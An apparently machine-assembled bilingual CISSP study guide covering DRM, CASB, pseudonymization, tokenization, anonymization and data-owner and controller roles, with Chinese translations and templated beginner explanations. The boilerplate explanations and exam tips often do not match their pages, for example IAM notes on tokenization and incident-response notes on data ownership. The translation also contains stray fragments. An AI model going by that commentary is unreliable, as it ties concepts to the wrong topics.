某些数字版权管理(DRM)方法试图防止受保护材料的复制、打印和转发。 数 字水印有时会通过隐写术嵌入音频或视频文件中。 它们虽然不能防止复制,但 可用于检测文件的未经授权复制,并可用于版权执法与起诉。 类似地,有时会 在文件中嵌入元数据以识别购买者。 许多组织和个人反对DRM。 他们声称它限制了对所购材料的合理使用。 例如, 在支付了一些歌曲的费用后,他们希望将这些歌曲复制到MP3播放器和智能手 机上。 此外,反对DRM的人声称,它对那些试图绕过它的人无效,反而使合法 用户使用起来更加复杂。 第4章深入探讨了知识产权、版权、商标、专利和商业秘密。 DRM方法用于 保护受版权保护的数据,但不用于保护商标、专利或商业秘密。 云访问安全代理 云访问安全代理(CASB)是一种逻辑上部署在用户与云资源之间的软件。 它 可以部署在本地或云端。 任何访问云的人都必须通过CASB软件。 它监控所有 活动并执行管理员定义的安全策略。 作为一个简单的例子,假设一家公司决定使用云提供商进行数据存储,但管理 层希望所有存储在云中的数据都经过加密。 CASB可以监控所有发送到云的数 据,并确保数据以加密格式到达并存储。

CASB 通常包括身份验证和授权控制,以确保只有授权用户才能访问云资源。 CASB 还可以记录所有访问行为、监控活动,并在发现可疑活动时发送警报。 一般来说,组织内部创建的任何安全控制措施都可以复制到 CASB 中。 这包括 组织实施的任何 DLP 功能。 CASB解决方案也可有效检测影子IT。 影子IT是指在未经IT部门批准甚至不知 情的情况下使用IT资源(如云服务)。 如果IT部门不了解这些使用情况,就无 法对其进行管理。 CASB解决方案可以通过收集和分析网络防火墙和Web日志 来检测影子IT。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
防火墙 防火墙根据规则控制网络流量进出。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 29 / PDF P352

第 352 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

proxies. Chapter 16, “Managing Security Operations,” covers other cloud topics. Pseudonymization Pseudonymization refers to the process of using pseudonyms to represent other data. When pseudonymization is performed effectively, it can result in less stringent requirements that would otherwise apply under the European Union (EU) General Data Protection Regulation (GDPR), covered in Chapter 4. The EU GDPR replaced the European Data Protection Directive (Directive 95/46/EC), and it became enforceable on May 25, 2018. It applies to all EU member states and to all countries transferring data to and from the EU and anyone residing in the EU. A pseudonym is an alias.

As an example, Harry Potter author J. K. Rowling published a book titled The Cuckoo's Calling under the pseudonym of Robert Galbraith. No one knew it was her, at least for a few months. Someone leaked that Galbraith was a pseudonym, and her agent later confirmed the rumor. Now, if you know the pseudonym, you'll know that any books attributed to Robert Galbraith are written by J. K. Rowling. Similarly, pseudonymization can prevent data from directly identifying an entity, such as a person. As an example, consider a medical record held by a doctor's office.

Instead of including personal information such as the patient's name, address, and phone number, it could just refer to the patient as Patient 23456 in the medical record. The doctor's office still needs this personal information, and it could be held in another database linking it to the patient pseudonym (Patient 23456). Note that in the example, the pseudonym (Patient 23456) refers to several pieces of information on the person. It's also possible for a pseudonym to refer to a single piece of information. For example, you can use one pseudonym for a first name and another pseudonym for a last name.

The key is to have another resource (such as another database) that allows you to identify the original data using the pseudonym.

中文直译 / 整理

代理。 第16章“安全管理运营”涵盖了其他云主题。 伪标识化 伪标识化是指使用伪标识来代表其他数据的过程。 当伪标识化有效实施时,它 可以降低原本适用于欧洲联盟(EU)《通用数据保护条例》(GDPR)的严 格要求,该条例详见第4章。 欧盟《通用数据保护条例》取代了《欧洲数据保护指令》(第95/46/EC 号指令),并于2018年5月25日开始生效。 它适用于所有欧盟成员国、所有向 欧盟和从欧盟传输数据的国家,以及所有居住在欧盟境内的人。 伪标识是一种别名。 例如,哈利·波特的作者J.K.罗琳以罗伯特·加尔布雷斯为笔 名出版了一本名为《布谷鸟的呼唤》的书。 至少在几个月内,没人知道这是她 写的。 后来有人泄露了加尔布雷斯是笔名,她的经纪人随后证实了这一传闻。 现在,如果你知道这个伪标识,你就会知道所有署名为罗伯特·加尔布雷斯的书 都是J.K.罗琳所著。 类似地,假名化可以防止数据直接识别某个实体,例如个人。 例如,考虑医生 办公室保存的医疗记录。 与其包含患者的姓名、地址和电话号码等个人信息, 不如在医疗记录中仅将患者标识为患者23456。

医生办公室仍需要这些个人信 息,并可将其保存在另一个数据库中,该数据库将信息与患者假名(患者 23456)关联起来。 请注意,在示例中,化名(患者23456)指的是关于该人的多项信息。 化名也 可能仅指向单条信息。 例如,您可以为姓氏使用一个化名,为名字使用另一个 化名。 关键是拥有另一个资源(如另一个数据库),以便使用化名识别原始数 据。

小白解释

场景先行:你是公司的安全负责人,正在读第 352 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 352 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 30 / PDF P353

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

The doctor's office can release pseudonymized data to medical researchers without compromising patients' privacy information. However, the doctor's office can still reverse the process to discover the original data if necessary. The GDPR refers to pseudonymization as replacing data with artificial identifiers. These artificial identifiers are pseudonyms. Tokenization Tokenization is the use of a token, typically a random string of characters, to replace other data. It is often used with credit card transactions. As an example, imagine Becky Smith has associated a credit card with her smartphone.

Tokenization with a credit card typically works like this: Registration When she first associated the credit card with her smartphone's digital wallet, the digital wallet's service provider securely sent the actual credit card information to a payment network (Visa, Mastercard, American Express) or the issuing bank. The payment network sent the credit card number to a tokenization vault controlled by the payment network or a third-party service provider. The vault created a token (a string of characters) and recorded the token along with the encrypted credit card number, and associated it with the user's phone.

The token was then sent to the digital wallet provider, which saved it to her smartphone. Usage Later, Becky goes to a Starbucks and buys a cup of coffee with her smartphone. Her smartphone passes the token to the point-of-sale (POS) system. The POS system sends the token to the credit card processor to authorize the charge. Validation The credit card processor sends the token to the tokenization vault. The vault answers with the unencrypted credit card data, and the credit card processor then processes the charge.

Completing the Sale The credit card processor sends only a reply to the POS system indicating the charge is approved or declined and, if approved, credits the seller for the purchase. In the past, credit card data has been intercepted and stolen at the POS system. However, when tokenization is used, the credit card number is never used or known to the POS system. The user transfers it once to the payment network, and the payment network stores an encrypted copy of the credit card number along with a token matched to this credit card. Later, the user

中文直译 / 整理

诊所可以将去标识化的数据发布给医学研究人员,而不会泄露患者的隐私信 息。 然而,如果有必要,诊所仍可逆向操作以发现原始数据。 GDPR 将假名化定义为使用人工标识符替换数据。 这些人工标识符称为假 名。 令牌化 令牌化 是使用令牌(通常为一串随机字符)来替换其他数据。 它常用于信用卡交 易。 举个例子,假设贝基·史密斯将一张信用卡与她的智能手机关联。 信用卡的令牌 化通常工作方式如下: 注册 当她首次将信用卡与智能手机的数字钱包关联时,数字钱包的服务提供商 将真实的信用卡信息安全地发送至支付网络(Visa、Mastercard、 American Express)或发卡银行。 支付网络将信用卡号发送至由支付网络或第 三方服务提供商控制的令牌化保险库。 保险库生成一个令牌(一串字符),记录 该令牌以及加密的信用卡号,并将其与用户的手机关联。 随后,该令牌被发送至 数字钱包提供商,并保存到她的智能手机中。 使用 后来,贝基去星巴克,用她的智能手机购买了一杯咖啡。 她的智能手机 将令牌传递给销售点(POS)系统。 POS 系统将令牌发送至信用卡处理机构 以授权该笔交易。 验证 信用卡处理器将令牌发送到令牌化保险库。

保险库返回未加密的信用卡数 据,然后信用卡处理器处理扣款。 完成销售 信用卡处理器仅向POS系统发送回复,指示扣款已批准或拒绝; 若批 准,则向卖家支付款项。 过去,信用卡数据曾在POS系统中被截获和窃取。 然而,当使用标记化技术时, 信用卡号从未被POS系统使用或知晓。 用户只需将其一次性传输至支付网络, 支付网络会存储该信用卡号的加密副本以及与之匹配的标记。 此后,用户

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
学习单元 31 / PDF P354

第 354 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

presents the token, and the payment processor validates the token through the tokenization vault. E-commerce sites that have recurring charges also use tokenization. Instead of the e-commerce site collecting and storing credit card data, the site obtains a token from the payment gateway or processor. The token is created by a tokenization service, which stores an encrypted copy of the credit card data and sends the token to the e-commerce site. The site processes a charge the same way as it does for a POS system. However, the e-commerce site doesn't hold any sensitive data.

Even if an attacker obtained a token and tried to make a charge with it, it would fail because the charges are only accepted from the e-commerce site. Tokenization is similar to pseudonymization. Pseudonymization uses pseudonyms to represent other data. Tokenization uses tokens to represent other data. Neither the pseudonym nor the token has any meaning or value outside the process that creates them and links them to the other data. Pseudonymization is most useful when releasing a dataset to a third party (such as researchers aggregating data) without releasing any privacy-related data to the third party.

Tokenization allows a third party (such as a payment network) to know the token and the original data. However, no one else knows both the token and the original data. Anonymization If you don't need personal data, another option is to use anonymization. Anonymization is the process of removing all relevant data so that it is theoretically impossible to identify the original subject or person. If done effectively, the GDPR is no longer relevant for the anonymized data. However, it can be difficult to truly anonymize the data. Data inference techniques may be able to identify individuals, even if personal data is removed. This is sometimes referred to as reidentification of anonymized data.

As an example, consider a database that includes a listing of all the actors who have starred or co-starred in movies in the last 75 years, along with the money they earned for each movie. The database has three tables. The Actor

中文直译 / 整理

提供该标记,支付处理方通过标记化保险库验证该标记。 具有定期收费的电子商务网站也使用令牌化。 与电子商务网站收集和存储信用 卡数据不同,该网站从支付网关或处理器获取一个令牌。 该令牌由令牌化服务 创建,该服务存储信用卡数据的加密副本,并将令牌发送给电子商务网站。 网 站处理收费的方式与POS系统相同。 然而,电子商务网站不保存任何敏感数据。 即使攻击者获取了令牌并尝试使用它进行收费,也会失败,因为收费仅接受来 自电子商务网站的请求。 令牌化类似于 pseudon ymization. 假名化使用假名来表示其他数据。 令牌化使用令牌来表示其他数据。 无论是假名还是令牌,它们在创建并将 其与其它数据关联的流程之外都没有任何意义或价值。 假名化在向第三方 (如聚合数据的研究人员)发布数据集而不向第三方发布任何与隐私相关 的数据时最为有用。 令牌化允许第三方(如支付网络)知晓令牌和原始数 据。 然而,没有人同时知晓令牌和原始数据。 匿名化 如果您不需要个人数据,另一种选择是使用匿名化。 匿名化是移除所 有相关数据的过程,使得理论上无法识别原始主体或个人。 如果有效实施, GDPR将不再适用于匿名化后的数据。

然而,真正实现数据匿名化可能非 常困难。 即使移除了个人数据,数据推断技术仍可能识别出个人身份。 这 有时被称为对匿名化数据的重新识别。 例如,考虑一个数据库,其中包含过去75年内所有主演或联合主演电影的演 员名单,以及他们每部电影的收入。 该数据库包含三个表。 演员

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 354 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
身份 身份是主体在系统中的标识。
学习单元 32 / PDF P355

第 355 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

table includes the actor names, the Movie table lists the movie names, and the Payment table reports the amount of money each actor earned for each movie. The three tables are linked so that you can query the database and easily identify how much money any actor earned for any movie. If you removed the names from the Actor table, it no longer includes personal data, but it is not truly anonymized. For example, Gene Hackman has been in more than 70 movies, and no other actor has been in all the same movies. If you identify those movies, you can now query the database and learn exactly how much he earned for each of those movies.

Even though his name was removed from the database, and that was the only obvious personal data in the database, data inference techniques can identify records applying to him. Randomized masking can be an effective method of anonymizing data. Randomized masking swaps (shuffles) data in individual data columns so that records no longer represent the actual data. However, the data still maintains aggregate values that can be used for other purposes, such as scientific purposes. As an example, Table 5.2 shows four records in a database with the original values. An example of aggregated data is the average age of the four people, which is 29.

TABLE 5.2 Unmodified data within a database First NameLast NameAge Joe Smith 25 Sally Jones 28 Bob Johnson 37 Maria Doe 26 Table 5.3 shows the records after data has been swapped around, effectively masking the original data. Notice that this becomes a random set of first names, a random set of last names, and a random set of ages. It looks like real data, but none of the columns relate to each other. However, it is still possible to retrieve aggregated data from the table. The average age is still 29.

中文直译 / 整理

表包含演员姓名,电影表列出电影名称,付款表报告每位演员每部电影的收 入金额。 这三个表相互关联,使您能够查询数据库,并轻松识别任何演员因 任何电影所获得的收入。 如果你从演员表中移除了姓名,它不再包含个人数据,但并未真正实现匿名化。 例如,吉恩·哈克曼出演过70多部电影,而没有其他演员出演过所有相同的电影。 如果你能识别出这些电影,就可以查询数据库,准确得知他每部电影的收入。 尽管他的姓名已被从数据库中移除,且这是数据库中唯一明显的个人数据,但 数据推断技术仍可识别出属于他的记录。 随机掩蔽是一种有效的数据匿名化方法。 随机掩蔽通过交换(打乱)单个数据 列中的数据,使记录不再代表实际数据。 然而,数据仍保留了可用于其他目的 的聚合值,例如科学用途。 例如,表5.2展示了数据库中具有原始值的四条记录。 聚合数据的一个示例是这四个人的平均年龄,为29岁。 表 5.2 数据库中的未修改数据 名 姓 年龄 Joe 史密斯 25 萨利 琼斯 28 Bob 约翰逊 37 玛丽亚 Doe 26 表 5.3显示了数据被重新排列后的记录,从而有效地掩盖了原始数据。 请注意, 这变成了一组随机的名、一组随机的姓和一组随机的年龄。

它看起来像真实数 据,但各列之间没有任何关联。 然而,仍然可以从表中提取聚合数据。 平均年 龄仍然是29。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 355 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 33 / PDF P356

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

TABLE 5.3 Masked data First NameLast NameAge Sally Doe 37 Maria Johnson 25 Bob Smith 28 Joe Jones 26 Someone familiar with the dataset may be able to reconstruct some of the data if the table has only three columns and only four records. However, this is an effective method of anonymizing data if the table has a dozen columns and thousands of records. Unlike pseudonymization and tokenization, anonymization cannot be reversed. After the data is randomized using an anonymization process, it cannot be returned to the original state. Understanding Data Roles Many people within an organization manage, handle, and use data, and they have different requirements based on their roles.

Different documentation refers to these roles a little differently. Some of the terms you may see match the terminology used in some NIST documents, and other terms match some of the terminology used in the EU GDPR. When appropriate, we've listed the source so that you can dig into these terms a little deeper if desired. One of the most important concepts here is ensuring that personnel know who owns information and assets. The owners have a primary responsibility of protecting the data and assets. Data Owners The data owner is the person who has ultimate organizational responsibility for data. The owner is typically the chief executive officer (CEO), president, or a department head.

Data owners identify the classification of data and ensure that it is labeled properly. They also ensure that it has adequate security controls based on the classification and the organization's security policy requirements. Owners may be liable for negligence if they fail to perform due diligence in establishing and enforcing security policies to protect and sustain sensitive data.

中文直译 / 整理

表 5.3 已脱敏数据 名 姓 年龄 Sally Doe 37 Maria Johnson 25 Bob Smith 28 Joe Jones 26 如果某人熟悉该数据集,并且该表仅有三列和四条记录,他们可能能够重建部 分数据。 但是,如果表有十几列和数千条记录,这是一种有效的数据匿名化方 法。 与假名化和标记化不同,匿名化是不可逆的。 在使用匿名化过程对数据进 行随机化后,无法将其恢复到原始状态。 理解数据角色 组织内的许多人员负责管理、处理和使用数据,他们根据自身角色有不同的需 求。 不同文档对这些角色的称呼略有不同。 有些术语与 NIST 文档中使用的术 语一致,另一些则与欧盟 GDPR 中使用的术语一致。 在适当的情况下,我们已 注明了来源,以便您在需要时可以更深入地了解这些术语。 这里最重要的概念之一是确保人员了解谁拥有信息和资产。 所有者负有保护数 据和资产的主要责任。 数据所有者 数据所有者是对其数据负有最终组织责任的人。 所有者通常是首席执行官( CEO)、总裁或部门主管。 数据所有者确定数据的分类,并确保其被正确标记。 他们还确保根据分类和组织的安全策略要求,实施适当的安全控制措施。

如果 所有者未能尽职建立和执行安全策略以保护和维持敏感数据,则可能因疏忽而 承担责任。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Owner 定规则,Custodian 执行保护。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

Owner 决策,Custodian 执行,User 按授权使用。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 34 / PDF P357

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

NIST SP 800-18, Rev.

1—Guide for Developing Security Plans for Federal Information Systems outlines the following responsibilities for the information owner, which can be interpreted the same as the data owner: Establishes the rules for appropriate use and protection of the subject data/information (rules of behavior) Provides input to information system owners regarding the security requirements and security controls for the information system(s) where the information resides Decides who has access to the information system and with what types of privileges or access rights Assists in the identification and assessment of the common security controls where the information resides NIST SP 800-18 frequently uses the phrase “rules of behavior,” which is effectively the same as an acceptable use policy (AUP).

Both outline the responsibilities and expected behavior of individuals and state the consequences of not complying with the rules or AUP. Additionally, individuals are required to periodically acknowledge that they have read, understand, and agree to abide by the rules or AUP. Many organizations post these on a website and allow users to acknowledge that they understand and agree to abide by them using an online electronic digital signature. Data Controllers and Processors Data controllers are the persons and organizations responsible for the collection and use of data.

In the language of GDPR, “the data controller determines the purposes for which and the means by which personal data is processed.” In other words, the data controller is the entity that determines the “how” and the “why” of personal data collection and use. This is true even if the data controller doesn't handle the data themselves. In many cases, data controllers outsource some data handling tasks to other organizations. These organizations are known as data processors. Under GDPR, a data processor is “a natural or legal person, public authority, agency, NIST SP 800‑18,

中文直译 / 整理

修订版1——《联邦信息系统安全计划制定指南》列出了 信息所有者的以下职责,这些职责可同样解释为数据所有者的职责: 确立有关主体数据/信息的适当使用和保护规则(行为准则) 向信息系统所有者提供有关信息系统的安全需求和安全控制的输入,其中信息 存储于 ere 信息 resides 决定谁可以访问信息系统以及具有何种类型的 权限或访问权 协助识别和评估信息所在位置的通用安全控制措施 NIST SP 800‑18 经常使用“行为准则”这一短语,其实际上等同于可 接受使用政策(AUP)。 两者均明确了个人的责任和预期行为,并说明了 不遵守规则或AUP的后果。 此外,个人需定期确认已阅读、理解并同意遵 守这些规则或AUP。 许多组织将这些内容发布在网站上,并允许用户通过 在线电子数字签名确认他们理解并同意遵守。 数据控制者和处理者 数据控制者是负责数据收集和使用的个人和组织。 根据GDPR的表述,“数据 控制者决定个人数据处理的目的和方式。 ”换言之,数据控制者是决定个人数 据收集和使用“如何”与“为何”的实体。 即使数据控制者自身不直接处理数 据,这一定义依然成立。 在许多情况下,数据控制者会将部分数据处理任务外包给其他组织。

这些组织被称 为数据处理者。 根据GDPR,数据处理者是“自然人或法人、公共机构、代理机构,

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

指南:指南是建议做法,不一定强制。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Owner 定规则,Custodian 执行保护。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Recommended、not compulsory 常对应 guideline。

Owner 决策,Custodian 执行,User 按授权使用。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
指南 指南是建议做法,不一定强制。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 35 / PDF P358

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

or other body, which processes personal data solely on behalf of the data controller.” As an example, an employer that collects personal information on employees for payroll is a data controller. If they pass this information to a third-party company to process payroll, the payroll company is the data processor. In this example, the payroll company (the data processor) must not use the data for anything other than processing payroll at the direction of the data controller. The GDPR restricts data transfers to countries outside the EU. Companies that violate privacy rules in the GDPR may face fines of up to 4 percent of their global revenue or 20 million Euros, whichever is higher.

Unfortunately, the GDPR is filled with legalese, presenting many challenges for organizations. As an example, clause 107 includes this single sentence statement: Consequently the transfer of personal data to that third country or international organisation should be prohibited, unless the requirements in this Regulation relating to transfers subject to appropriate safeguards, including binding corporate rules, and derogations for specific situations are fulfilled. As a result, many organizations have created dedicated roles, such as a data privacy officer (DPO), to oversee the control of data and ensure the organization follows all relevant laws and regulations.

The GDPR has mandated the role of a data protection officer for any organization that must comply with the GDPR. The person in this role is responsible for ensuring the organization applies the laws to protect individuals' private data. Data Custodians Data owners often delegate day-to-day tasks to a data custodian. A custodian helps protect the integrity and security of data by ensuring that it is properly stored and protected. For example, custodians would ensure that the data is backed up by following guidelines in a backup policy. If administrators have configured auditing on the data, custodians would also maintain these logs.

In practice, personnel within an IT department or system security administrators would typically be the custodians. They might be the same administrators responsible for assigning permissions to data. Users and Subjects

中文直译 / 整理

